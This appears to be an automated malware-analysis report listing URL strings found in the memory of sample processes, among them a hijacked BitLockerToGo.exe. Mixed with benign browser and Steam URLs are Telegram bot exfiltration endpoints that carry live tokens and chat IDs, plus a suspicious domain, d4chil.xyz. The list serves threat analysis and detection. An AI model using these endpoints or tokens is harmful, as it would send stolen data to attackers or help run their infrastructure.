Source: i8Vwc7iOaG.exe, 00000000.00000003.2177753619.0000000005A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000001E.00000002.4059390222.0000599C0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000001E.00000002.4059390222.0000599C0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetY
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 0000001E.00000003.3619897056.0000599C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 0000001E.00000002.4059390222.0000599C0008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: t0IHakP.exe, 0000001D.00000002.4813359985.00000000030C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.000000000311A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: t0IHakP.exe, 0000001D.00000002.4813359985.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
Source: t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7625290642:AAEC_TIsp8mXV-r4b_JsskPORSmz8QErTI0/sendDocument?chat_id=1227
Source: t0IHakP.exe, 0000001D.00000002.4813359985.00000000030C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7625290642:AAEC_TIsp8mXV-r4b_JsskPORSmz8QErTI0/sendMessage?chat_id=12274
Source: t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.000000000314C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535546010.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: chrome.exe, 0000001E.00000002.4063178908.0000599C0050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000001E.00000002.4123897804.0000599C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: i8Vwc7iOaG.exe, 00000000.00000003.2131707046.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131783037.00000000059EB000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2131646197.00000000059EE000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718462536.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3713220087.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.0000000005892000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000001E.00000002.4123588300.0000599C00B90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 0000001E.00000002.4123588300.0000599C00B90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 0000001E.00000002.4123588300.0000599C00B90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000001E.00000003.3592693960.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000001E.00000002.4131260899.0000599C01170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000001E.00000003.3592024012.0000599C00D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3591453155.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3595720806.0000599C00D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3592693960.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000001E.00000002.4063704789.0000599C005EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4063941277.0000599C00644000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000001E.00000002.4120190161.0000599C007E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000001E.00000002.4063993238.0000599C00650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000002.3538249313.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527707379.00000000016EC000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3535045174.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp, k0ukcEH.exe, 0000001B.00000003.3527146391.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: i8Vwc7iOaG.exe, 00000000.00000003.2179307012.0000000005A30000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2179154912.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3160365317.000000000B990000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005D16000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4652908614.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000005AC000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3505942462.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3481902303.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4620113858.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz
Source: BitLockerToGo.exe, 0000001A.00000003.3554307178.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4628840026.000000000583F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3457553886.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3530170826.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B7B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3505942462.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3481902303.0000000002BA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d4chil.xyz/
